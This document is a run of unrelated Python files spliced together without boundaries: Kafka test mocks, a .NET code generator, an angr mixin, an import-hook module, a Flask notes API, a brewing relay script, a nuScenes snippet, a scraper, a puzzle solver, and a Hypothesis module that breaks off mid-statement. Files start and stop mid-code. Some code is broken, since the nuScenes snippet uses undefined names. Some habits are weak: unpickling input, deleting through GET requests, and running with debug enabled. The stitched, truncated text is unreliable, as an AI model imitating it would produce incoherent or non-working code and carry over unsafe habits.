kafka_consumer.messages import BaseMessageProcessor from kafka_consumer.exceptions import ErrorMessageReceiverProcess def fake_generic_message(dt=datetime.now(tz=utc), name=0, data=None): """Generate fake message value""" timestamp = int((dt - datetime(1970, 1, 1, tzinfo=utc)).total_seconds() * 1000) return { "name": name, "time": timestamp, "data": data, } def fake_message_value(dt=datetime.now(tz=utc), name=0, data={}): """Generate 
fake message value, params see fake_generic_message""" return fake_generic_message(dt, name, data) def stringify_message_value(value): """Stringify message value""" return json.dumps(value).encode('utf-8') def fake_raw_message(value): """Make fake raw message""" return stringify_message_value(value) def create_kafka_message(value): """Create message with packed value""" return Message(value) def kafka_client_init(self, *args, **kwargs): # pylint: disable=unused-argument """Mocked KafkaClient __init__ method :param args: positional arguments of the functions that is decorated :type args: list :param kwargs: keyword arguments of the functions that is decorated :type kwargs: dict """ pass def kafka_client_close(self, *args, **kwargs): # pylint: disable=unused-argument """Mocked KafkaClient close method :param args: positional arguments of the functions that is decorated :type args: list :param kwargs: keyword arguments of the functions that is decorated :type kwargs: dict """ pass def kafka_consumer_poll(self, max_records=None, *args, **kwargs): # pylint: disable=unused-argument """Mocked KafkaConsumer kafka_consumer_poll method :param self: KafkaConsumer instance :param max_records: maximal numbers of records in batch. :param args: positional arguments of the functions that is decorated :type args: list :param kwargs: keyword arguments of the functions that is decorated :type kwargs: dict :return: dict of messages """ if max_records is None: result = self.messages self.messages = [] else: result = self.messages[:max_records] self.messages = self.messages[max_records:] result = {(TopicPartition("test_topic", 0)): result} return result def kafka_consumer_close(*args): """Mocked KafkaConsumer kafka_consumer_close method :param self: KafkaConsumer instance """ pass def kafka_consumer_partitions_for_topic(self, topic): """Mock KafkaConsumer partitions_for_topic method Arguments: topic (str): Topic to check. Returns: set: Partition ids """ return {0, 1, 2, 3, 4} def kafka_consumer_end_offsets(self, partitions): """Mock KafkaConsumer end_offsets method Arguments: partitions (list): List of TopicPartition instances to fetch offsets for. Returns: ``{TopicPartition: int}``: The end offsets for the given partitions. Raises: UnsupportedVersionError: If the broker does not support looking up the offsets by timestamp. KafkaTimeoutError: If fetch failed in request_timeout_ms """ return self.offsets def kafka_consumer_seek(self, partition, offset): """Mock KafkaConsumer seek method Arguments: partition (TopicPartition): Partition for seek operation offset (int): Message offset in partition Raises: AssertionError: If offset is not an int >= 0; or if partition is not currently assigned. 
""" try: self.offsets[partition] = offset except Exception: raise AssertionError def mock_kafka_server(messages_values=None): """A decorator that mock kafka server :param messages_values: list of message values to be returned by mocked server :type messages_values: list :return: the decorator :rtype: 'types.FunctionType' """ def decorator(func=None): """The decorated function to be returned :param func: the function that is decorated :type func: `types.FunctionType` """ @wraps(func) def wrapper(*args, **kwargs): """Patch KafkaClient and SimpleConsumer methods before executing the function :param args: positional arguments of the functions that is decorated :type args: list :param kwargs: keyword arguments of the functions that is decorated :type kwargs: dict """ def kafka_consumer_init(self, *args, **kwargs): # pylint: disable=unused-argument """Mocked KafkaConsumer __init__ method Create sample messages based on given messages values that will be return in kafka_get_messages :param args: positional arguments of the functions that is decorated :type args: list :param kwargs: keyword arguments of the functions that is decorated :type kwargs: dict """ self.messages = [ConsumerRecord("test_topic", 0, i + 16123456, None, None, None, create_kafka_message(value), None, None, None) for i, value in enumerate(messages_values or [])] self.offsets = {TopicPartition("test_topic", i): random.randint(10, 1200) for i in range(5)} with patch.object(KafkaClient, '__init__', kafka_client_init),\ patch.object(KafkaClient, 'close', kafka_client_close),\ patch.object(KafkaConsumer, '__init__', kafka_consumer_init),\ patch.object(KafkaConsumer, 'poll', kafka_consumer_poll),\ patch.object(KafkaConsumer, 'partitions_for_topic', kafka_consumer_partitions_for_topic),\ patch.object(KafkaConsumer, 'end_offsets', kafka_consumer_end_offsets),\ patch.object(KafkaConsumer, 'seek', kafka_consumer_seek),\ patch.object(KafkaConsumer, 'close', kafka_consumer_close): return func(*args, **kwargs) return wrapper return decorator @contextmanager def enabled_logging(): """Ensure logging is enabled.""" initial_level = logging.root.manager.disable logging.disable(logging.NOTSET) try: yield finally: logging.disable(initial_level) class TestableBaseSubscriber(BaseSubscriber): def _handle(self, message): pass def _should_process_message(self, message): return True class ClumsySubscriber(BaseSubscriber): def _handle(self, message): pass def _should_process_message(self, message): raise ErrorMessageReceiverProcess('Ups, I did it again') class FaddySubscriber(BaseSubscriber): # Wybredny, kapryśny def _handle(self, message): pass def _should_process_message(self, message): return False class JsonMessageProcessor(BaseMessageProcessor): """Simple processor for purely JSON messages.""" @cached_property def _parsed_kafka_message(self) -> dict: """Method to parse raw data from kafka message :rtype: dict :raises: BadMessageValue """ return json.loads(self._kafka_message) def get_type(self): return self._parsed_kafka_message['name'] def get_time(self): return self._parsed_kafka_message['time'] def get_data(self): return self._parsed_kafka_message['data'] class PickleMessageProcessor(BaseMessageProcessor): """Processor for plain message. 
Raw data is given as dict of fields, which directly maps to Message without any decompression, deserialization, decryption stuff This class is provided for testing purpose """ def __init__(self, src_kafka_message, config_key=None): kafka_message = pickle.loads(src_kafka_message) super(PickleMessageProcessor, self).__init__(kafka_message, config_key) def get_type(self): return self._kafka_message['name'] def get_time(self): return self._kafka_message['time'] def get_data(self): return self._kafka_message['data'] class ClumsyMessageProcessor(PickleMessageProcessor): # - Ciamajda def __init__(self, *args, **kwargs): raise Exception('Ups, I did it again') Src/Scripts/generate_dynamic_instructions.py1000+ # Licensed to the .NET Foundation under one or more agreements. # The .NET Foundation licenses this file to you under the Apache 2.0 License. # See the LICENSE file in the project root for more information. import sys from generate import generate MAX_TYPES = 16 MAX_ARGS = 3 MAX_HELPERS = 7 TYPE_CODE_TYPES = ['Int16', 'Int32', 'Int64', 'Boolean', 'Char', 'Byte', 'Decimal', 'DateTime', 'Double', 'Single', 'UInt16', 'UInt32', 'UInt64', 'String', 'SByte'] def get_args(i): return ['arg' + str(x) for x in range(i)] def get_arr_args(i): return ['args[' + str(x) + ']' for x in range(i)] def get_object_args(i): return ['object arg' + str(x) for x in range(i)] def get_type_names(i): if i == 1: return ['T0'] return ['T' + str(x) for x in range(i)] def get_invoke_type_names(i): return get_type_names(i - 1) + ['TRet'] def get_cast_args(i): return ['(%s)%s' % (x[0], x[1]) for x in zip(get_type_names(i), get_args(i))] def get_type_params(i): if i == 0: return '' return '<' + ', '.join(get_type_names(i)) + '>' def gen_instruction(cw, n): type_names = get_type_names(n) class_type_params = ','.join(type_names + ['TRet']) func_type_params = ','.join(['CallSite'] + type_names + ['TRet']) func_type = 'Func<%s>' % func_type_params cw.enter_block('internal class DynamicInstruction<%s> : Instruction' % class_type_params) cw.write('private CallSite<%s> _site;' % func_type) cw.write('') cw.enter_block('public static Instruction Factory(CallSiteBinder binder)') cw.write('return new DynamicInstruction<%s>(CallSite<%s>.Create(binder));' % (class_type_params, func_type)) cw.exit_block() cw.write('') cw.enter_block('private DynamicInstruction(CallSite<%s> site)' % func_type) cw.write('_site = site;') cw.exit_block() cw.write('') cw.write('public override int ProducedStack { get { return 1; } }') cw.write('public override int ConsumedStack { get { return %d; } }' % n) cw.write('') gen_interpreted_run(cw, n) cw.write('') cw.enter_block('public override string ToString()') cw.write('return "Dynamic(" + _site.Binder.ToString() + ")";') cw.exit_block() cw.exit_block() cw.write('') def gen_interpreted_run(cw, n): cw.enter_block('public override int Run(InterpretedFrame frame)') args = '_site' for i in range(0, n): args += ', (T%d)frame.Data[frame.StackIndex - %d]' % (i, n - i) cw.write('frame.Data[frame.StackIndex - %d] = _site.Target(%s);' % (n, args))\ if n != 1: cw.write('frame.StackIndex -= %d;' % (n - 1)) cw.write('return 1;') cw.exit_block() def gen_types(cw): for i in range(MAX_TYPES): cw.write('case %d: genericType = typeof(DynamicInstruction<%s>); break;' % (i+1, ''.join([',']*i))) def gen_untyped(cw): for i in range(MAX_TYPES): cw.write('case %d: return DynamicInstruction<%s>.Factory(binder);' % (i, ', '.join(['object']*(i+1)))) def gen_instructions(cw): for i in range(MAX_TYPES): gen_instruction(cw, i) def 
gen_run_method(cw, n, is_void): type_params = ['T%d' % i for i in range(n)] param_names = ['T%d arg%d' % (i,i) for i in range(n)] if is_void: ret_type = 'void' name_extra = 'Void' else: ret_type = 'TRet' name_extra = '' type_params.append(ret_type) if type_params: types = '<' + ','.join(type_params) + '>' else: types = '' cw.enter_block('internal %s Run%s%d%s(%s)' % (ret_type, name_extra, n, types, ','.join(param_names))) cw.enter_block('if (_compiled != null || TryGetCompiled())') args = ', '.join(['arg%d' % i for i in range(n)]) if is_void: cw.write('((Action%s)_compiled)(%s);' % (types, args)) cw.write('return;') else: cw.write('return ((Func%s)_compiled)(%s);' % (types, args)) cw.exit_block() cw.write('') cw.write('var frame = MakeFrame();') for i in range(n): cw.write('frame.Data[%d] = arg%d;' % (i,i)) cw.write('var current = frame.Enter();') cw.write('try { _interpreter.Run(frame); } finally { frame.Leave(current); }') if not is_void: cw.write('return (TRet)frame.Pop();') cw.exit_block() cw.write('') def gen_run_maker(cw, n, is_void): type_params = ['T%d' % i for i in range(n)] if is_void: name_extra = 'Void' delegate_name = 'Action' else: type_params.append('TRet') name_extra = '' delegate_name = 'Func' if type_params: types = '<' + ','.join(type_params) + '>' else: types = '' cw.enter_block('internal static Delegate MakeRun%s%d%s(LightLambda lambda)' % (name_extra, n, types)) cw.write('return new %s%s(lambda.Run%s%d%s);' % (delegate_name, types, name_extra, n, types, )); cw.exit_block() def gen_run_methods(cw): cw.write('internal const int MaxParameters = %d;' % MAX_TYPES) for i in range(MAX_TYPES): gen_run_method(cw, i, False) gen_run_method(cw, i, True) gen_run_maker(cw, i, False) gen_run_maker(cw, i, True) def gen_instructionlist_factory(cw): for i in range(1, MAX_TYPES): gen_args = ', '.join(get_type_names(i)) cw.enter_block('public void EmitDynamic<%s, TRet>(CallSiteBinder binder)' % gen_args) cw.write('Emit(DynamicInstruction<%s, TRet>.Factory(binder));' % gen_args) cw.exit_block() cw.write('') def main(): return generate( ("Dynamic InstructionList Factory", gen_instructionlist_factory), ("LightLambda Run Methods", gen_run_methods), ("Dynamic Instructions", gen_instructions), ("Dynamic Instruction Types", gen_types), ("Untyped Dynamic Instructions", gen_untyped), ) if __name__ == "__main__": main() import pyvex from .heavy import HeavyVEXMixin from angr.state_plugins.sim_action import SimActionObject, SimActionData, SimActionExit, SimActionOperation from angr import sim_options as o class TrackActionsMixin(HeavyVEXMixin): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.__tmp_deps = {} __tls = ('__tmp_deps',) def handle_vex_block(self, irsb): self.__tmp_deps = {} super().handle_vex_block(irsb) def _handle_vex_const(self, const): return super()._handle_vex_const(const), frozenset() def _handle_vex_expr_GSPTR(self, expr): return super()._handle_vex_expr_GSPTR(expr), frozenset() def _handle_vex_expr_VECRET(self, expr): return super()._handle_vex_expr_VECRET(expr), frozenset() def _handle_vex_expr_Binder(self, expr): return super()._handle_vex_expr_Binder(expr), frozenset() def _instrument_vex_expr(self, result): return super()._instrument_vex_expr(result[0]), result[1] def _perform_vex_expr_Op(self, op, args): exprs, deps = zip(*args) result = super()._perform_vex_expr_Op(op, exprs) if o.TRACK_OP_ACTIONS in self.state.options: action_objects = [SimActionObject(arg, deps=dep, state=self.state) for arg, dep in args] r = SimActionOperation(self.state, op, 
action_objects, result) self.state.history.add_action(r) result_deps = frozenset((r,)) else: result_deps = frozenset().union(*deps) return result, result_deps def _perform_vex_expr_ITE(self, *args): exprs, deps = zip(*args) combined_deps = frozenset().union(*deps) result = super()._perform_vex_expr_ITE(*exprs) return result, combined_deps # TODO for this and below: what if we made AUTO_DEPS work here? def _perform_vex_expr_CCall(self, func_name, ty, args, func=None): exprs, deps = zip(*args) combined_deps = frozenset().union(*deps) result = super()._perform_vex_expr_CCall(func_name, ty, exprs, func=None) return result, combined_deps def _perform_vex_stmt_Dirty_call(self, func_name, ty, args, func=None): exprs, deps = zip(*args) if args else ((), ()) combined_deps = frozenset().union(*deps) result = super()._perform_vex_stmt_Dirty_call(func_name, ty, exprs, func=None) return result, combined_deps def _perform_vex_expr_RdTmp(self, tmp): result = super()._perform_vex_expr_RdTmp(tmp) # finish it and save the tmp reference if o.TRACK_TMP_ACTIONS in self.state.options: r = SimActionData(self.state, SimActionData.TMP, SimActionData.READ, tmp=tmp, size=self.irsb.tyenv.sizeof(tmp), data=result) self.state.history.add_action(r) a = frozenset((r,)) else: a = self.__tmp_deps.get(tmp, frozenset()) return result, a def _perform_vex_expr_Get(self, offset_bundle, ty, **kwargs): offset, offset_deps = offset_bundle result = super()._perform_vex_expr_Get(offset, ty, **kwargs) if o.TRACK_REGISTER_ACTIONS in self.state.options: offset_ao = SimActionObject(offset, deps=offset_deps, state=self.state) r = SimActionData(self.state, self.state.registers.id, SimActionData.READ, addr=offset_ao, size=pyvex.get_type_size(ty), data=result ) self.state.history.add_action(r) a = frozenset((r,)) else: a = frozenset() return result, a def _perform_vex_expr_Load(self, addr_bundle, ty, end, **kwargs): addr, addr_deps = addr_bundle result = super()._perform_vex_expr_Load(addr, ty, end, **kwargs) if o.TRACK_MEMORY_ACTIONS in self.state.options: addr_ao = SimActionObject(addr, deps=addr_deps, state=self.state) r = SimActionData(self.state, self.state.memory.id, SimActionData.READ, addr=addr_ao, size=pyvex.get_type_size(ty), data=result) self.state.history.add_action(r) a = frozenset((r,)) else: a = frozenset() return result, a # statements def _perform_vex_stmt_WrTmp(self, tmp, data_bundle, **kwargs): data, data_deps = data_bundle if o.TRACK_TMP_ACTIONS not in self.state.options: self.__tmp_deps[tmp] = data_deps super()._perform_vex_stmt_WrTmp(tmp, data, deps=data_deps) def _perform_vex_stmt_Put(self, offset_bundle, data_bundle, **kwargs): offset, offset_deps = offset_bundle data, data_deps = data_bundle # track the put if o.TRACK_REGISTER_ACTIONS in self.state.options: data_ao = SimActionObject(data, deps=data_deps, state=self.state) size_ao = SimActionObject(len(data)) a = SimActionData(self.state, SimActionData.REG, SimActionData.WRITE, addr=offset, data=data_ao, size=size_ao) self.state.history.add_action(a) else: a = None super()._perform_vex_stmt_Put(offset, data, action=a, **kwargs) def _perform_vex_stmt_Store(self, addr_bundle, data_bundle, end, condition=None, **kwargs): addr, addr_deps = addr_bundle data, data_deps = data_bundle if condition is not None: condition, condition_deps = condition else: condition_deps = None # track the write if o.TRACK_MEMORY_ACTIONS in self.state.options and addr_deps is not None: data_ao = SimActionObject(data, deps=data_deps, state=self.state) addr_ao = SimActionObject(addr, 
deps=addr_deps, state=self.state) size_ao = SimActionObject(len(data)) cond_ao = SimActionObject(condition, deps=condition_deps, state=self.state) if condition_deps is not None else None a = SimActionData(self.state, SimActionData.MEM, SimActionData.WRITE, data=data_ao, size=size_ao, addr=addr_ao, condition=cond_ao) self.state.history.add_action(a) else: a = None super()._perform_vex_stmt_Store(addr, data, end, action=a, condition=condition, **kwargs) def _perform_vex_stmt_Exit(self, guard_bundle, target_bundle, jumpkind): guard, guard_deps = guard_bundle target, target_deps = target_bundle if o.TRACK_JMP_ACTIONS in self.state.options: guard_ao = SimActionObject(guard, deps=guard_deps, state=self.state) target_ao = SimActionObject(target, deps=target_deps, state=self.state) self.state.history.add_action(SimActionExit(self.state, target=target_ao, condition=guard_ao, exit_type=SimActionExit.CONDITIONAL)) super()._perform_vex_stmt_Exit(guard, target, jumpkind) def _perform_vex_defaultexit(self, target_bundle, jumpkind): if target_bundle is not None: target, target_deps = target_bundle if o.TRACK_JMP_ACTIONS in self.state.options: target_ao = SimActionObject(target, deps=target_deps, state=self.state) self.state.history.add_action(SimActionExit(self.state, target_ao, exit_type=SimActionExit.DEFAULT)) else: target = None super()._perform_vex_defaultexit(target, jumpkind) """ .. admonition:: Summary This example illustrates how one can change the indentation of an entire block of code, eliminate lines, and change the content much more drastically than what the previous examples have done. The idea behind this example is to help reduce the amount of typing required and increases readability when assigning attributes in a class's ``__init__()`` method. Auto self ========== Python is known for its concise and readable syntax. One exception about the concisiveness is the boiler plate code that has to be written when defining one's own class, especially if it has many attributes, like:: self.this_variable = this_variable self.that_variable = that_variable self.this_other_variable = this_other_variable self.foo = foo self.bar = bar self.baz = [] if baz is None else baz self.spam = bread + ham This leads people to ask on various forums, such as `this question on StackOverflow `_, how to do automatic assignment of attributes. The answers most often given are: - Don't do it; learn to live with the explicit ``self``. - Use a decorator, with various examples provided. As programmers create more classes, they find the need to add their own dunder methods, such as ``__eq__(self, other)``, ``__repr__(self)``, etc. Eventually, they might get annoyed enough at having to re-create these methods too often, with the occasional typo causing bugs that they jump with joy when discovering `attrs: Classes Without Boilerplate `_. Starting with Python 3.7, the standard library includes `dataclasses `_ which shares some similarity with ``attrs``. However, it does require to use type hints which, in my opinion, reduces readability; note that many programmers find that type hints increase readability. 
As a concrete example of using traditional Python notation and dataclasses, let's consider the code given in `PEP 557 `_ but reformatted with Black:: class Application: def __init__( self, name, requirements, constraints=None, path="", executable_links=None, executables_dir=(), ): self.name = name self.requirements = requirements self.constraints = {} if constraints is None else constraints self.path = path self.executable_links = [] if executable_links is None else executable_links self.executables_dir = executables_dir self.additional_items = [] From the same PEP document, this is the proposed code which gives the same initialization, but using the ``@dataclass`` decorator:: from dataclasses import dataclass @dataclass class Application: name: str requirements: List[Requirement] constraints: Dict[str, str] = field(default_factory=dict) path: str = '' executable_links: List[str] = field(default_factory=list) executable_dir: Tuple[str] = () additional_items: List[str] = field(init=False, default_factory=list) This code does more than simply initializing the variables, but I do not find it particularly readable. So, I was wondering if it might be possible to imagine a simpler syntax. ``auto_self`` is what I came up with. .. admonition:: That ship has sailed ... I realize that there is zero chance that the following syntax would be adopted, especially now that the ``dataclasses`` module has been added to the Python standard library. Still, you can try it out using ``auto_self`` hook. .. code-block:: python class Application: def __init__( self, name, requirements, constraints=None, path="", executable_links=None, executables_dir=(), ): self .= : name requirements constraints = {} if __ is None else __ path executable_links = [] if __ is None else __ executables_dir additional_items = [] Here, I am using a new operator, ``.=``, which is meant to represent the automatic assignment of a variable to the name that precedes it (``self`` in this example). I have seen this idea for such an operator before on **python-ideas** but never for introducing a code block as I do here. By design, any *dunder* (double underscore), ``__``, is taken to be equivalent to the variable being initialized. I chose a dunder instead of a single underscore ``_`` so that it could be used in a REPL without creating conflicts with the existing use of a single underscore in Python's REPL. I also find that it makes it more readable. Of course, one is not restricted to using ``self``, or having to use ``__`` everywhere. The following is completely equivalent - although I now find it less readable, having been used to seeing ``__`` as easy to scan placeholder:: class Application: def __init__( cls, name, requirements, constraints=None, path="", executable_links=None, executables_dir=(), ): cls .= : name requirements constraints = {} if constraints is None else constraints path executable_links = [] if __ is None else executable_links executables_dir cls.additional_items = [] .. warning:: Unlike ``@dataclass`` or ``attrs``, no additional method is created by ``auto_self``. 
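For reference, here is a minimal sketch of how the hook defined in this module
might be enabled (this assumes the file is importable as ``auto_self``; the
module name ``my_module`` is hypothetical)::

    import auto_self

    auto_self.add_hook()   # registers the source transformation in sys.meta_path
    import my_module       # my_module can now use the ``self .= :`` block syntax

Any module imported after ``add_hook()`` is run through ``transform_source``
below, so the ``.=`` blocks are rewritten into ordinary attribute assignments
before compilation.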
""" from ideas import import_hook import token_utils def transform_source(source, **_kwargs): """Replaces code like:: self .= : a b c = this if __ == that else ___ by:: self.a = a self.b = b self.c = this if c == that else c """ new_tokens = [] auto_self_block = False self_name = "" indentation = 0 get_nb = token_utils.get_number get_first = token_utils.get_first get_first_index = token_utils.get_first_index for tokens in token_utils.get_lines(source): if auto_self_block: variable = get_first(tokens) if variable is not None: # None would mean an empty line var_name = variable.string block_indent = variable.start_col if block_indent > indentation: dedent = block_indent - indentation if get_nb(tokens) == 1: variable.string = f"{self_name}.{var_name} = {var_name}" tokens = token_utils.dedent(tokens, dedent) else: variable.string = f"{self_name}.{var_name}" for token in tokens: if token.string == "__": token.string = var_name tokens = token_utils.dedent(tokens, dedent) else: auto_self_block = False elif get_nb(tokens) == 4: index = get_first_index(tokens) if ( tokens[index].is_identifier() and tokens[index + 1] == "." and tokens[index + 2] == "=" and tokens[index + 1].end_col == tokens[index + 2].start_col and tokens[index + 3] == ":" ): self_name = tokens[index].string indentation = tokens[index].start_col auto_self_block = True continue new_tokens.extend(tokens) return token_utils.untokenize(new_tokens) def add_hook(**_kwargs): """Creates and adds the import hook in sys.meta_path""" hook = import_hook.create_hook( transform_source=transform_source, hook_name=__name__, ) return hook from flask import Flask, request, json, Response, Blueprint from flask_restx import Api, Resource, fields from flask_cors import CORS import os import src.data.database as db from src.data.model import Note app = Flask(__name__) blueprint = Blueprint('api', __name__, url_prefix='/docs') api = Api(app=app, version='1.0', title='Note Taking App', description='Python playground', blueprint=blueprint, doc='/docs', default_label='Note Taking Namespace', default='note-taking') app.register_blueprint(blueprint) ns = api.namespace('Note', description='Note APIs') model = api.model('Note', { 'note_id': fields.String(required=True, description="ID of the note.", help="Cannot be blank."), 'timestamp': fields.Integer(description="Note's timestamp.", help="UNIX epoch."), 'content': fields.String(description="The actual note.") }) if os.environ['FLASK_ENV'] == 'development': cors = CORS(app, resources={r"/api/*": {"origins": "*"}}) else: cors = CORS(app) app.config['CORS_HEADERS'] = 'Content-Type' def buildListResult(notes: list): final_notes = [] for note in notes: final_notes += [note.to_dict()] return Response(response=json.dumps(final_notes), status=200, mimetype="application/json") @api.route('/api/list') class ListNotes(Resource): """Shows a list of all notes""" @ns.doc('list_notes') # FIXME: auto marshal # @ns.marshal_list_with(model) @ns.response(200, "List of notes.") @ns.response(400, "'limit' parameter should be an integer.") @ns.response(404, "Notes not found.") @ns.param(name='limit', description='The maximum number of elements to return.') def get(self): limit_parameter = request.args.get('limit') if limit_parameter is not None: try: limit = int(limit_parameter) except ValueError: # throw 400 if limit is not an int. 
return "'limit' parameter should be an integer!", 400 else: limit = 50 notes = db.list_notes(limit) if notes is None or notes == []: return [], 404 else: return buildListResult(notes) @api.route('/api/get') class GetNote(Resource): """Gets a note""" @ns.doc('get_note') # FIXME: auto marshal # @ns.marshal_with(model) @ns.response(200, "The note.") @ns.response(400, "'id' parameter should not be empty.") @ns.response(404, "Note not found.") @ns.param(name='id', description='The note id to retrieve.') def get(self): id_parameter = request.args.get('id') if id_parameter is None or id_parameter == "": return "'id' parameter should not be empty!", 400 note = db.get_note(id_parameter) if note is None: return f"Note with id '{id_parameter}' not found.", 404 else: return Response(response=json.dumps(note.to_dict()), status=200, mimetype="application/json") @api.route('/api/delete') class DeleteNote(Resource): """Deletes a note""" @ns.doc('delete_note') @ns.response(200, "Success") @ns.response(400, "'id' parameter should not be empty.") @ns.param(name='id', description='The note id to delete.') def get(self): id_parameter = request.args.get('id') if id_parameter is None or id_parameter == "": return "'id' parameter should not be empty!", 400 db.delete_note(id_parameter) return 'OK', 200 @api.route('/api/save') class SaveNote(Resource): """Saves a note""" @ns.doc('save_note') @ns.expect(model) @ns.response(200, "Success") @ns.response(400, "Request body is empty.") def post(self): payload = request.get_json() if payload is None or payload == {}: return "'payload' should not be empty!", 400 note = Note(**payload) db.store_note(note) return 'OK', 200 if __name__ == '__main__': app.run(debug=True, port=8080) butschi/brewpi-father0 import json import requests brewpi_url = 'http://brewpi.local/socketmessage.php' brewfather_url = 'http://log.brewfather.net/brewpiless?id=XXXXXXXXXXXXXX' def get_brewdata(): response = requests.post( brewpi_url, data={'messageType': 'getTemperatures'} ) if response.status_code == 200: return json.loads(response.content.decode('utf-8')) else: return None def post_brewdata(data): response = requests.post( brewfather_url, data=json.dumps(data), headers={'Content-Type': 'application/json'} ) if response.status_code == 200: return json.loads(response.content.decode('utf-8')) else: print(response) return None def map_brewdata(data): return dict( id='1', fridgeSet=data.get('FridgeSet'), beerTemp=data.get('BeerTemp'), beerSet=data.get('BeerSet'), fridgeTemp=data.get('FridgeTemp') ) brewdata = get_brewdata() if brewdata is not None: print("Current temperatures: ") print(brewdata) result = post_brewdata(map_brewdata(brewdata)) print(result) else: print('[!] 
Request Failed') from nuscenes.prediction.models.backbone import ResNetBackbone from nuscenes.prediction.models.mtp import MTP from nuscenes.prediction.models.covernet import CoverNet from nuscenes.prediction.input_representation.static_layers import StaticLayerRasterizer from nuscenes.prediction.input_representation.agents import AgentBoxesWithFadedHistory from nuscenes.prediction.input_representation.combinators import Rasterizer from nuscenes.prediction.input_representation.interface import InputRepresentation from nuscenes import NuScenes import matplotlib.pyplot as plt import torch DATAROOT = '/data/sets/nuscenes' nuscenes = NuScenes('v1.0-mini', dataroot=DATAROOT) # Data Splits for the Prediction Challenge # input representation static_layer_rasterizer = StaticLayerRasterizer(helper) agent_rasterizer = AgentBoxesWithFadedHistory(helper, seconds_of_history) mtp_input_representation = InputRepresentation(static_layer_rasterizer, agent_rasterizer, Rasterizer()) instance_token_img, sample_token_img = '', '7626dde27d604ac28a0240bdd54eba7a' anns = [ann for ann in nuscenes.sample_annotation if ann['instance_token'] == instance_token_img] img = mtp_input_representation.make_input_representation(instance_token_img, sample_token_img) plt.imshow(img) # Model Implementations import re from .utils import get_website_content, write_to_file from bs4 import BeautifulSoup import inquirer import pandas as pd choices = [ "Page title", "Headings and Subheadings", "All paragraphs", "Links", "Images", "Tables", "All text from page", "Whole source code" ] questions = [ inquirer.Text("site", message="Which site do you want to scrape"), inquirer.List( "parse_object", message="Which object do you want to parse", choices=choices ), inquirer.Confirm("write_to_file", message="Should the output be written to file", default=False) ] answers = inquirer.prompt(questions) # Get the site's content site = "https://" + answers["site"] if not answers["site"].startswith("https://") else answers["site"] content = get_website_content(site) # Create the soup soup = BeautifulSoup(content, "lxml") # Match the choices choice = answers["parse_object"] file_write = answers["write_to_file"] if choice == choices[0]: title = soup.find("title") if not title: print("No page title detected.") elif file_write: write_to_file(title.text, "title.txt") else: print(title.text) elif choice == choices[1]: headings = soup.find_all(["h1", "h2", "h3"]) if not headings or len(headings) == 0: print("No headings found!") else: headings = [heading.text for heading in headings] if file_write: write_to_file("\n".join(headings), "headings.txt") else: print("\n".join(headings)) elif choice == choices[2]: paragraphs = soup.find_all("p") if not paragraphs or len(paragraphs) == 0: print("No paragraphs found!") else: paragraphs = [ paragraph.text.replace("\n", "").strip() for paragraph in paragraphs ] if file_write: write_to_file("\n".join(paragraphs), "paragraphs.txt") else: print("\n".join(paragraphs)) elif choice == choices[3]: links = soup.find_all("a") if not links or len(links) == 0: print("No links found!") else: links = [str((link["href"], link.text)) for link in soup.find_all("a")] if file_write: write_to_file("\n".join(links), "links.txt") else: print("\n".join(links)) elif choice == choices[4]: images = soup.find_all("img") if not images or len(images) == 0: print("No images found!") else: images = [image["src"] for image in images] if file_write: write_to_file("\n".join(images), "image_urls.txt") else: print("\n".join(images)) elif choice == 
choices[5]: tables = soup.find_all("table") if not tables or len(tables) == 0: print("No table found!") else: table_list = [] for index, table in enumerate(tables): table_list.append([]) body = table.find_all("tr") head = body[0] body_rows = body[1:] table_list[index].append(tuple([ item.text.rstrip("\n") for item in head.find_all("th") ])) for row_num in range(len(body_rows)): row = [] for row_item in body_rows[row_num].find_all("td"): aa = re.sub("(\xa0)|(\n)|,", "", row_item.text) row.append(aa) table_list[index].append(tuple(row)) for index, table in enumerate(table_list): table = pd.DataFrame(table[1:], columns=table[0]) print(f"Table #{index + 1}\n{table}\n") elif choice == choices[6]: complete_text = soup.get_text() if file_write: write_to_file(complete_text, "page_content.txt") else: print(complete_text) else: code = soup.prettify() if file_write: write_to_file(code, "index.html") else: print(code) 0 from parse import parse with open('Day13/input.txt') as f: data = [value.rstrip() for value in f.readlines()] dots = {tuple(parse('{:d},{:d}', d)) for d in data[:data.index('')]} instructions = [tuple(parse('fold along {}={:d}', d)) for d in data[data.index('')+1:]] def fold(dots, axis, line): new_dot = [0, 0] if axis == 'x': i = 0 else: i = 1 for dot in list(filter(lambda x: x[i] > line, dots)): dots.remove(dot) new_dot[i] = 2*line - dot[i] new_dot[1-i] = dot[i-1] dots.add(tuple(new_dot)) def show_paper(dots): width = max(dots, key=lambda x: x[0])[0] height = max(dots, key=lambda x: x[1])[1] for y in range(height+1): print( ('').join(['x' if (x, y) in dots else ' ' for x in range(width+1)])) for instruction in instructions: fold(dots, *instruction) show_paper(dots) # coding=utf-8 # # This file is part of Hypothesis (https://github.com/DRMacIver/hypothesis) # # Most of this work is copyright (C) 2013-2015 # (), but it contains contributions by others. See # https://github.com/DRMacIver/hypothesis/blob/master/CONTRIBUTING.rst for a # full list of people who may hold copyright, and consult the git log if you # need to determine who owns an individual contribution. # # This Source Code Form is subject to the terms of the Mozilla Public License, # v. 2.0. If a copy of the MPL was not distributed with this file, You can # obtain one at http://mozilla.org/MPL/2.0/. 
# # END HEADER from __future__ import division, print_function, absolute_import import math import struct from decimal import Decimal from hypothesis.errors import InvalidArgument from hypothesis.control import assume from hypothesis.searchstrategy import SearchStrategy from hypothesis.internal.compat import ArgSpec, text_type, getargspec, \ integer_types, float_to_decimal from hypothesis.internal.reflection import proxies from hypothesis.searchstrategy.reprwrapper import ReprWrapperStrategy __all__ = [ 'just', 'one_of', 'none', 'choices', 'booleans', 'integers', 'floats', 'complex_numbers', 'fractions', 'decimals', 'characters', 'text', 'binary', 'tuples', 'lists', 'sets', 'frozensets', 'dictionaries', 'fixed_dictionaries', 'sampled_from', 'builds', 'randoms', 'random_module', 'streaming', 'recursive', 'composite', ] class FloatKey(object): def __init__(self, f): self.value = float_to_int(f) def __eq__(self, other): return isinstance(other, FloatKey) and ( other.value == self.value ) def __ne__(self, other): return not self.__eq__(other) def __hash__(self): return hash(self.value) def convert_value(v): if isinstance(v, float): return FloatKey(v) return (type(v), v) def cacheable(fn): import weakref cache = weakref.WeakValueDictionary() @proxies(fn) def cached_strategy(*args, **kwargs): kwargs_cache_key = set() try: for k, v in kwargs.items(): kwargs_cache_key.add((k, convert_value(v))) except TypeError: return fn(*args, **kwargs) cache_key = ( tuple(map(convert_value, args)), frozenset(kwargs_cache_key)) try: return 